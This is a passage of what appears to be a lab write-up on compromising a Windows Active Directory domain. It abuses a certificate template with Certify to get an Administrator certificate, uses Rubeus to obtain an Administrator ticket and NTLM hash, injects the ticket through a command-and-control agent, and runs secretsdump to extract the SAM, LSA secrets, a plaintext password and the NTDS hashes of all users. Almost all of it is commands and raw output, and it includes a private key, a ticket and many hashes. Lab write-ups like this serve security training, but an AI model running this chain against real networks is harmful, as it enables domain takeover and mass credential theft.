  \_____\___|_|   \__|_|_|  \__, |   
                             __/ |       
                            |___./        
  v1.0.0                               

[*] Action: Request a Certificates

[*] Current user context    : MYTHICAL-US\Momo.Ayase
[*] No subject name specified, using current context as subject.

[*] Template                : Machine
[*] Subject                 : CN=Momo Ayase, OU=employees, DC=mythical-us, DC=vl
[*] AltName                 : Administrator

[*] Certificate Authority   : dc01.mythical-us.vl\mythical-us-DC01-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 3

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAzfc1Z8DpBZxeX2MZ7bzKi1CVdf6mFv4m9QyI6vSxEGp8gC3T
bxjmcW+kHQtlzIfjT+kQmfaTn9FEZqdqn4YeV+jCfTttpDIqZbzOJ2q8kHz8532Y
T/bzmVp0sG+BAOAdLw0wR7uDOEm9D10pvbSm7ssQc60gK3nhzusIjeWfkyNmHCqF
/N8mtkSxYi07pYqzhlOJgsTDwAH36TLGi7+ciV3MikOeDaLqifNdAikMEKfGfvVq
kxgeRw3CgxOd7S9st6QPKhSBraiHIQIZwJT+ZPkiB+cmfVF8x/d/8Lcnq0dx48gy
HbF1reyKnMsokaC/Bn1wd+rnGo4CnlZJ8jHhwQIDAQABAoIBAH7pyEexcCTb8K74
Qt7iSTBFLIOzsSZT3y96VNfqhTynUSYulq1Le5wEfezDvCumxCPWajtk3BxLd8mF
ecbofsQOkeFXAD2AB+3+xE03kQ+7ZJ9EHdmQQxSIz4R0gNpIPtNiXhClc7r4fP39
mx3hNkfIas/Mqxj/FmxJGVFOX+Dqf9HxOJwUi2hwJKtaqzGesrNwveYaGPoem/Fb
Wd31ywY6pGO80t5KibGFEQEop4u2YQ+miUAK87SnF0hIDmtNCOpvkS9cIKb4OLaU
N+eknqnrQT3nmK69BMvWjzXMVsASHXOo+QdieY+SdGrvLTSrxQMfAJI3IjTxg4v8
i29Twy0CgYEA/M8sWaYqJbauJhWDflSt4j9UQWgnW9sPm21NKotkIh2kQcIn8WGZ
oN8+ZdR4IaoxHgiPW25LqwmKtXkBCG5KtMu7daeBCm5Roe4MQC4g92k5wDsM6LWc
Kf+SN90mCGc6TpCuHx9OQDjzF0ifyliXQ7h/ZAeC4o0S0dadjE8yAYMCgYEA0JCv
BGYxZzt/T1bV4ggBc0VdfORu0VwiccjD8j7gr6BcsvoN2dn7IDhY8OAznWg4T/2z
b/KSMY4RE7mWMJP83Qw+B807ZNGGRvpLNJyWIXpuxTzK/Dkoh8r+E9G+EHYBgIbF
U3ftgeIcmhwzySe0npPE23xR2lhY0nRb+ADjwGsCgYEAmXiHWvEFuxlYRSRgTAvJ
94QsePxqkFe+9ML4ynAOXKuT8JuWNfHjGocL0TOXrhAseygFJyMg6ncDbsFDgEO8
NF9NsNH8A0IPanchlsCqIKgPeAQhBRBi+hf9Qs6M7SMFgXZRTfFqRpCL+kGLR4Ja
abESHL52lWPA3gQkZm4ZVFMCgYEAuR+jaZk3wrTJ5Odjw1RtzR5FxASS5JwOKscU
PeJX1yvU/Dv9rV/RiqDZOT0YM2B9k2rSKcy6vOen+sUhLY89xAsIyC3/yRY9RKUH
ufQ/QgoFZmb2mXg2pImminsCZGQKI0X8woDRvRaxYo0j3imzJYpuEo+/q7n9ZRhJ
RdGsVm8CgYEA3cKkR54jwpTUx7PvYYKNQBWswuuDo3z0rWzdvI3ygC+lBnL1lmD2
k3M64QcN4Uv8yr79GXiPpZAJx8RHhe6VJ/AuFP+b+c+50cGO+36dcEsDc9FxV8O0
myoMCvY75EKAhsypipjDXLzCprFavphQp/R9jALrnkbIsG05IYeexFQ=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGkzCCBHugAwIBAgITJwAAAAOnxIm6BEFu+gAAAAAAAzANBgkqhkiG9w0BAQsF
ADBPMRIwEAYKCZImiZPyLGQBGRYCdmwxGzAZBgoJkiaJk/IsZAEZFgtteXRoaWNh
bC11czEcMBoGA1UEAxMTbXl0aGljYWwtdXMtREMwMS1DQTAeFw0yNDEyMDkxMTAy
NTZaFw0yNTEyMDkxMTAyNTZaMFoxEjAQBgoJkiaJk/IsZAEZFgJ2bDEbMBkGCgmS
JomT8ixkARkWC215dGhpY2FsLXVzMRIwEAYDVQQLEwllbXBsb3llZXMxEzARBgNV
BAMTCk1vbW8gQXlhc2UwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDN
9zVnwOkFnF5fYxntvMqLUJV1/qYW/ib1DIjq9LEQanyALdNvGOZxb6QdC2XMh+NP
6RCZ9pOf0URmp2qfhh5X6MJ9O22kMiplvM4naryQfPznfZhP9vOZWnSwb4EA4B0v
DTBHu4M4Sb0PXSm9tKbuyxBzrSAreeHO6wiN5Z+TI2YcKoX83ya2RLFiLTulirOG
U4mCxMPAAffpMsaLv5yJXcyKQ54NouqJ810CKQwQp8Z+9WqTGB5HDcKDE53tL2y3
pA8qFIGtqIchAhnAlP5k+SIH5yZ9UXzH93/wtyerR3HjyDIdsXWt7IqcyyiRoL8G
fXB36ucajgKeVknyMeHBAgMBAAGjggJbMIICVzAdBgkrBgEEAYI3FAIEEB4OAE0A
YQBjAGgAaQBuAGUwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMA4GA1Ud
DwEB/wQEAwIFoDAdBgNVHQ4EFgQUqre7KA/ElPB2EHXnVkXYx7G96V8wKAYDVR0R
BCEwH6AdBgorBgEEAYI3FAIDoA8MDUFkbWluaXN0cmF0b3IwHwYDVR0jBBgwFoAU
9bkc8DOViFPTfoICvqYW/l3Nr24wgdEGA1UdHwSByTCBxjCBw6CBwKCBvYaBumxk
YXA6Ly8vQ049bXl0aGljYWwtdXMtREMwMS1DQSxDTj1kYzAxLENOPUNEUCxDTj1Q
dWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0
aW9uLERDPW15dGhpY2FsLXVzLERDPXZsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxp
c3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCByAYIKwYB
BQUHAQEEgbswgbgwgbUGCCsGAQUFBzAChoGobGRhcDovLy9DTj1teXRoaWNhbC11
cy1EQzAxLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1T
ZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW15dGhpY2FsLXVzLERDPXZsP2NB
Q2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9y
aXR5MA0GCSqGSIb3DQEBCwUAA4ICAQDd5/cZatRseeZzl0BeBRwNroynALuaxIGF
K0ii4yFnH7phdxZi92/AB0R6nnAZb0z47tcsubQD/oShV6B1UoDLnMg5/jTolj5X
5HupuNL+qk9iCBs/B+44t7StSmbkCAh6VVw0qHj4T7aSd50JPTm9mA/eVzQNda1E
hxm+znL6xiTvcfFTnnB4hU6z9gh2ItPf7P5juD4NPtxvgKN6BLExRr2RHjusMM0S
nRtUSHev3N0S5woFaQTylLo+LweBOkf/fTo+NXnaxDUZCXSEwRp++BAYFsqHfWy0
UqMOTkz3W5Mmnb7s6HgY2CuCOurXOjBzRqgv+7TUtOhezTmKPISSatogsJpyWwQr
kbUqVaFVzWt93LlhCBe7s4lggnESvGEHwT+OVo2bn1HjFcgQf47NiNrCeNjly/qh
PHCXGh/IwIz3265KhF4H4mYuENPb3ocS3p7X7yWnSnnau3fGGWbYM35GfCaANKH1
ukddp/GnVlyz0ylr3LXrK2aPISf4l5REFqyzwit3Ci6o3ftZTlZaw3fA3/c8Aquz
XRaipCSGCA2r+qI5qb0mo6HpbGrE0udSx5yAhxgm+dDcDANWPHFaXN/AakQnLxLh
kaKM5Gwj9d2K3c+iU1kPo3spz9YrqsM+Z0O3wgcSQXvFGkEWjMP2A57zcly6qFV7
y90NjgpLDA==
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:16.0021935

Convert it to a certificate PFX:

$ cat cert.pem 
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAzfc1Z8DpBZxeX2MZ7bzKi1CVdf6mFv4m9QyI6vSxEGp8gC3T
bxjmcW+kHQtlzIfjT+kQmfaTn9FEZqdqn4YeV+jCfTttpDIqZbzOJ2q8kHz8532Y
T/bzmVp0sG+BAOAdLw0wR7uDOEm9D10pvbSm7ssQc60gK3nhzusIjeWfkyNmHCqF
/N8mtkSxYi07pYqzhlOJgsTDwAH36TLGi7+ciV3MikOeDaLqifNdAikMEKfGfvVq
kxgeRw3CgxOd7S9st6QPKhSBraiHIQIZwJT+ZPkiB+cmfVF8x/d/8Lcnq0dx48gy
HbF1reyKnMsokaC/Bn1wd+rnGo4CnlZJ8jHhwQIDAQABAoIBAH7pyEexcCTb8K74
Qt7iSTBFLIOzsSZT3y96VNfqhTynUSYulq1Le5wEfezDvCumxCPWajtk3BxLd8mF
ecbofsQOkeFXAD2AB+3+xE03kQ+7ZJ9EHdmQQxSIz4R0gNpIPtNiXhClc7r4fP39
mx3hNkfIas/Mqxj/FmxJGVFOX+Dqf9HxOJwUi2hwJKtaqzGesrNwveYaGPoem/Fb
Wd31ywY6pGO80t5KibGFEQEop4u2YQ+miUAK87SnF0hIDmtNCOpvkS9cIKb4OLaU
N+eknqnrQT3nmK69BMvWjzXMVsASHXOo+QdieY+SdGrvLTSrxQMfAJI3IjTxg4v8
i29Twy0CgYEA/M8sWaYqJbauJhWDflSt4j9UQWgnW9sPm21NKotkIh2kQcIn8WGZ
oN8+ZdR4IaoxHgiPW25LqwmKtXkBCG5KtMu7daeBCm5Roe4MQC4g92k5wDsM6LWc
Kf+SN90mCGc6TpCuHx9OQDjzF0ifyliXQ7h/ZAeC4o0S0dadjE8yAYMCgYEA0JCv
BGYxZzt/T1bV4ggBc0VdfORu0VwiccjD8j7gr6BcsvoN2dn7IDhY8OAznWg4T/2z
b/KSMY4RE7mWMJP83Qw+B807ZNGGRvpLNJyWIXpuxTzK/Dkoh8r+E9G+EHYBgIbF
U3ftgeIcmhwzySe0npPE23xR2lhY0nRb+ADjwGsCgYEAmXiHWvEFuxlYRSRgTAvJ
94QsePxqkFe+9ML4ynAOXKuT8JuWNfHjGocL0TOXrhAseygFJyMg6ncDbsFDgEO8
NF9NsNH8A0IPanchlsCqIKgPeAQhBRBi+hf9Qs6M7SMFgXZRTfFqRpCL+kGLR4Ja
abESHL52lWPA3gQkZm4ZVFMCgYEAuR+jaZk3wrTJ5Odjw1RtzR5FxASS5JwOKscU
PeJX1yvU/Dv9rV/RiqDZOT0YM2B9k2rSKcy6vOen+sUhLY89xAsIyC3/yRY9RKUH
ufQ/QgoFZmb2mXg2pImminsCZGQKI0X8woDRvRaxYo0j3imzJYpuEo+/q7n9ZRhJ
RdGsVm8CgYEA3cKkR54jwpTUx7PvYYKNQBWswuuDo3z0rWzdvI3ygC+lBnL1lmD2
k3M64QcN4Uv8yr79GXiPpZAJx8RHhe6VJ/AuFP+b+c+50cGO+36dcEsDc9FxV8O0
myoMCvY75EKAhsypipjDXLzCprFavphQp/R9jALrnkbIsG05IYeexFQ=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGkzCCBHugAwIBAgITJwAAAAOnxIm6BEFu+gAAAAAAAzANBgkqhkiG9w0BAQsF
ADBPMRIwEAYKCZImiZPyLGQBGRYCdmwxGzAZBgoJkiaJk/IsZAEZFgtteXRoaWNh
bC11czEcMBoGA1UEAxMTbXl0aGljYWwtdXMtREMwMS1DQTAeFw0yNDEyMDkxMTAy
NTZaFw0yNTEyMDkxMTAyNTZaMFoxEjAQBgoJkiaJk/IsZAEZFgJ2bDEbMBkGCgmS
JomT8ixkARkWC215dGhpY2FsLXVzMRIwEAYDVQQLEwllbXBsb3llZXMxEzARBgNV
BAMTCk1vbW8gQXlhc2UwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDN
9zVnwOkFnF5fYxntvMqLUJV1/qYW/ib1DIjq9LEQanyALdNvGOZxb6QdC2XMh+NP
6RCZ9pOf0URmp2qfhh5X6MJ9O22kMiplvM4naryQfPznfZhP9vOZWnSwb4EA4B0v
DTBHu4M4Sb0PXSm9tKbuyxBzrSAreeHO6wiN5Z+TI2YcKoX83ya2RLFiLTulirOG
U4mCxMPAAffpMsaLv5yJXcyKQ54NouqJ810CKQwQp8Z+9WqTGB5HDcKDE53tL2y3
pA8qFIGtqIchAhnAlP5k+SIH5yZ9UXzH93/wtyerR3HjyDIdsXWt7IqcyyiRoL8G
fXB36ucajgKeVknyMeHBAgMBAAGjggJbMIICVzAdBgkrBgEEAYI3FAIEEB4OAE0A
YQBjAGgAaQBuAGUwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMA4GA1Ud
DwEB/wQEAwIFoDAdBgNVHQ4EFgQUqre7KA/ElPB2EHXnVkXYx7G96V8wKAYDVR0R
BCEwH6AdBgorBgEEAYI3FAIDoA8MDUFkbWluaXN0cmF0b3IwHwYDVR0jBBgwFoAU
9bkc8DOViFPTfoICvqYW/l3Nr24wgdEGA1UdHwSByTCBxjCBw6CBwKCBvYaBumxk
YXA6Ly8vQ049bXl0aGljYWwtdXMtREMwMS1DQSxDTj1kYzAxLENOPUNEUCxDTj1Q
dWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0
aW9uLERDPW15dGhpY2FsLXVzLERDPXZsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxp
c3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCByAYIKwYB
BQUHAQEEgbswgbgwgbUGCCsGAQUFBzAChoGobGRhcDovLy9DTj1teXRoaWNhbC11
cy1EQzAxLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1T
ZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW15dGhpY2FsLXVzLERDPXZsP2NB
Q2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9y
aXR5MA0GCSqGSIb3DQEBCwUAA4ICAQDd5/cZatRseeZzl0BeBRwNroynALuaxIGF
K0ii4yFnH7phdxZi92/AB0R6nnAZb0z47tcsubQD/oShV6B1UoDLnMg5/jTolj5X
5HupuNL+qk9iCBs/B+44t7StSmbkCAh6VVw0qHj4T7aSd50JPTm9mA/eVzQNda1E
hxm+znL6xiTvcfFTnnB4hU6z9gh2ItPf7P5juD4NPtxvgKN6BLExRr2RHjusMM0S
nRtUSHev3N0S5woFaQTylLo+LweBOkf/fTo+NXnaxDUZCXSEwRp++BAYFsqHfWy0
UqMOTkz3W5Mmnb7s6HgY2CuCOurXOjBzRqgv+7TUtOhezTmKPISSatogsJpyWwQr
kbUqVaFVzWt93LlhCBe7s4lggnESvGEHwT+OVo2bn1HjFcgQf47NiNrCeNjly/qh
PHCXGh/IwIz3265KhF4H4mYuENPb3ocS3p7X7yWnSnnau3fGGWbYM35GfCaANKH1
ukddp/GnVlyz0ylr3LXrK2aPISf4l5REFqyzwit3Ci6o3ftZTlZaw3fA3/c8Aquz
XRaipCSGCA2r+qI5qb0mo6HpbGrE0udSx5yAhxgm+dDcDANWPHFaXN/AakQnLxLh
kaKM5Gwj9d2K3c+iU1kPo3spz9YrqsM+Z0O3wgcSQXvFGkEWjMP2A57zcly6qFV7
y90NjgpLDA==
-----END CERTIFICATE-----
                                                                                                                                                          
$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password: <JUST PRESS ENTER>
Verifying - Enter Export Password: <JUST PRESS ENTER>

Import the PFX:

upload -File cert.pfx

Import Rubeus in the agent:

registry_assembly

image

Get the TGT of Administrator:

execute_assembly -Assembly Rubeus.exe -Arguments "asktgt /user:Administrator /certificate:c:\programdata\1\cert.pfx /nowrap /getcredentials"

With this command we get the ticket and the NTLMHash too


   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Momo Ayase, OU=employees, DC=mythical-us, DC=vl 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'mythical-us.vl\Administrator'
[*] Using domain controller: fe80::c7e0:a060:1ed5:2f97:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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

  ServiceName              :  krbtgt/mythical-us.vl
  ServiceRealm             :  MYTHICAL-US.VL
  UserName                 :  Administrator
  UserRealm                :  MYTHICAL-US.VL
  StartTime                :  12/9/2024 4:35:36 AM
  EndTime                  :  12/9/2024 2:35:36 PM
  RenewTill                :  12/16/2024 4:35:36 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  GCV0nvXn+MoSD3v9bMcFpw==
  ASREP (key)              :  FD698E61B435BC5CCC716FD70A4D36E7

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : C583EF48C5ED66C727AECB6FAB87AC12

List current Kerberos ticket:

ticket_cache_list
Enumerated Tickets 
 Ticket # 0:

KerberosTicketInfoDTO
{
	Luid = 0xb37157, 
	ClientName = FromRPWNWithLove$, 
	ClientDomain = MYTHICAL-US.VL, 
	ClientFullName = FromRPWNWithLove$@MYTHICAL-US.VL, 
	ServiceName = krbtgt/MYTHICAL-US.VL, 
	ServiceDomain = MYTHICAL-US.VL, 
	ServiceFullName = krbtgt/MYTHICAL-US.VL@MYTHICAL-US.VL, 
	StartTime = 12/9/2024 2:52:46 AM, 
	EndTime = 12/9/2024 12:52:46 PM, 
	TimeUntilExpiration = 00.09:19:13, 
	RenewTime = 12/16/2024 2:52:46 AM, 
	TimeUntilRenewal = 06.23:19:13, 
	EncryptionType = aes256_cts_hmac_sha1, 
	TicketFlags = NameCanonicalize, PreAuthent, Renewable, Forwarded, Forwardable, 
}

Clear it:

ticket_cache_purge
Purged Ticket from Cache

Add the Administrator ticket:

ticket_cache_add

image

Injected Ticket into Cache

Double check:

ticket_cache_list
Enumerated Tickets 
 Ticket # 0:

KerberosTicketInfoDTO
{
	Luid = 0xb37157, 
	ClientName = Administrator, 
	ClientDomain = MYTHICAL-US.VL, 
	ClientFullName = Administrator@MYTHICAL-US.VL, 
	ServiceName = krbtgt/mythical-us.vl, 
	ServiceDomain = MYTHICAL-US.VL, 
	ServiceFullName = krbtgt/mythical-us.vl@MYTHICAL-US.VL, 
	StartTime = 12/9/2024 3:30:24 AM, 
	EndTime = 12/9/2024 1:30:24 PM, 
	TimeUntilExpiration = 00.09:52:38, 
	RenewTime = 12/16/2024 3:30:24 AM, 
	TimeUntilRenewal = 06.23:52:38, 
	EncryptionType = aes256_cts_hmac_sha1, 
	TicketFlags = NameCanonicalize, PreAuthent, Initial, Renewable, Forwardable, 
}

Now we can use the embedded mimikatz to grab all hashes, or we can also proceed compiling binaries for Windows of the Impacket suite.

Inject secretsdump in our agent:

registry_assembly

Then let’s dump:

execute_assembly -Assembly secretsdump.exe -Arguments "-hashes :C583EF48C5ED66C727AECB6FAB87AC12 -dc-ip 10.10.140.37 administrator@dc01.mythical-us.vl"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe92df2a3b420773632499e1f967dc526
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c583ef48c5ed66c727aecb6fab87ac12:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
MYTHICAL-US\DC01$:aes256-cts-hmac-sha1-96:680298a2079cf0cb21c9c3c2ffed50770312bf33270a2822e6462fe343495ffb
MYTHICAL-US\DC01$:aes128-cts-hmac-sha1-96:68712ece4a1eeb762ebd0164f4d926be
MYTHICAL-US\DC01$:des-cbc-md5:6be5ef0e38abd9f7
MYTHICAL-US\DC01$:plain_password_hex:3338b9124fff7839f2ff910470ef4312121a45d5302dd4f534cf84f6d88ffdba513e428210ba49cb6e073329f3d98be6e8c025f717210ca4cdee96ea6c21e0795535db6e3d980d6c47be04eb43d72a1b88e514bb36d7df0b10830e883e2966fe8ca03b01c22dfaf5add8dfe43739156eb3ca66493218ead0934664f45aa9e4ed3f088f9b99b46748393e1e204916ba8a95e913527388619d64c9e78b2a46df143e56ebe18cbadba91c969dc5caa956327be01ae856c6d4446dec3e2cc81666509f4a7f77a729b559083c0d4f9e3e2aced9b99616c015a5f498267080aff18d8f1a7315697ca506000bba84f74326e9b6
MYTHICAL-US\DC01$:aad3b435b51404eeaad3b435b51404ee:6d82715c3977ae0d538226986e7655a2:::
[*] DefaultPassword 
MYTHICAL-US.vl\Momo.Ayase:HelloTurboGranny25
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x3c33a6bd780910442197a37a2a2877f3d79888a1
dpapi_userkey:0x0345c3ecb89a2fe8aa8f78b197e475403deb92df
[*] NL$KM 
 0000   22 22 3D FA F7 0B A3 23  C9 65 56 42 EC C5 54 1B   ""=....#.eVB..T.
 0010   EB F5 60 60 C6 90 BB D2  4B B4 B4 DA E1 4C 1E B7   ..``....K....L..
 0020   45 92 09 C8 49 57 02 5B  7A 92 CC FD 41 C1 52 FE   E...IW.[z...A.R.
 0030   48 8A F0 71 DF 11 3E FB  25 8C 45 EE 78 FF CF F2   H..q..>.%.E.x...
NL$KM:22223dfaf70ba323c9655642ecc5541bebf56060c690bbd24bb4b4dae14c1eb7459209c84957025b7a92ccfd41c152fe488af071df113efb258c45ee78ffcff2
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c583ef48c5ed66c727aecb6fab87ac12:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0d1aaa2416b53c30141eaafe58442106:::
mythical-us.vl\Lynne.Baker:1104:aad3b435b51404eeaad3b435b51404ee:e1fa616453ec34099c31d7f56f7f06b7:::
mythical-us.vl\Rosie.Harrison:1105:aad3b435b51404eeaad3b435b51404ee:3f0bafb79f79d5c59d74a87d169875a7:::
mythical-us.vl\Bethany.Davidson:1106:aad3b435b51404eeaad3b435b51404ee:b25997600f3c1d4b0e34b25b09944fb9:::
mythical-us.vl\Irene.Lees:1107:aad3b435b51404eeaad3b435b51404ee:a21f2bdb88df6bc8e7785e40f7c537f6:::
mythical-us.vl\Sandra.Davies:1108:aad3b435b51404eeaad3b435b51404ee:d8c2a24755ddfd691cd57c231ffe18e4:::
mythical-us.vl\Liam.Clarke:1109:aad3b435b51404eeaad3b435b51404ee:f3447084eba8e3fe791e910908c052c5:::
mythical-us.vl\Nathan.Miles:1110:aad3b435b51404eeaad3b435b51404ee:cd73c3bc505478f3547fe58b9881cd09:::
mythical-us.vl\Christopher.Bailey:1111:aad3b435b51404eeaad3b435b51404ee:4e5f3874b1cdef4e88af889568a4b289:::
mythical-us.vl\Michelle.Cole:1112:aad3b435b51404eeaad3b435b51404ee:1534f2f9eea7170bb0173c054b4cba99:::
mythical-us.vl\Mohammed.Miles:1113:aad3b435b51404eeaad3b435b51404ee:4c3fc36ffb42e5a0042477fc04fa47c6:::
mythical-us.vl\Olivia.Baldwin:1114:aad3b435b51404eeaad3b435b51404ee:b1e34cd0b3b1cf105a881a81ece81968:::
mythical-us.vl\Alison.King:1115:aad3b435b51404eeaad3b435b51404ee:8eebe881c4d7cab3736104be750739f1:::
mythical-us.vl\Elliott.Barrett:1116:aad3b435b51404eeaad3b435b51404ee:a027f559f00f5a58b4a7e9ebcd1400bc:::
mythical-us.vl\Cameron.Taylor:1117:aad3b435b51404eeaad3b435b51404ee:6b81188ddfeccf688d26ae86fd0094c9:::
mythical-us.vl\Nigel.Coles:1118:aad3b435b51404eeaad3b435b51404ee:abd363b791da43a1b20f1d204eae7869:::
mythical-us.vl\Julian.Ross:1119:aad3b435b51404eeaad3b435b51404ee:bb8ba56b11224a3094321ef8d105c1a9:::
mythical-us.vl\Nicholas.Dobson:1120:aad3b435b51404eeaad3b435b51404ee:70bc13ee8d82d1fc786df9b5e3b42008:::
mythical-us.vl\Katherine.Pearce:1121:aad3b435b51404eeaad3b435b51404ee:f8fa0da9910cc05407e3f6afc100c706:::
mythical-us.vl\Bruce.Foster:1122:aad3b435b51404eeaad3b435b51404ee:125639201b29d6e5e9486add19542833:::
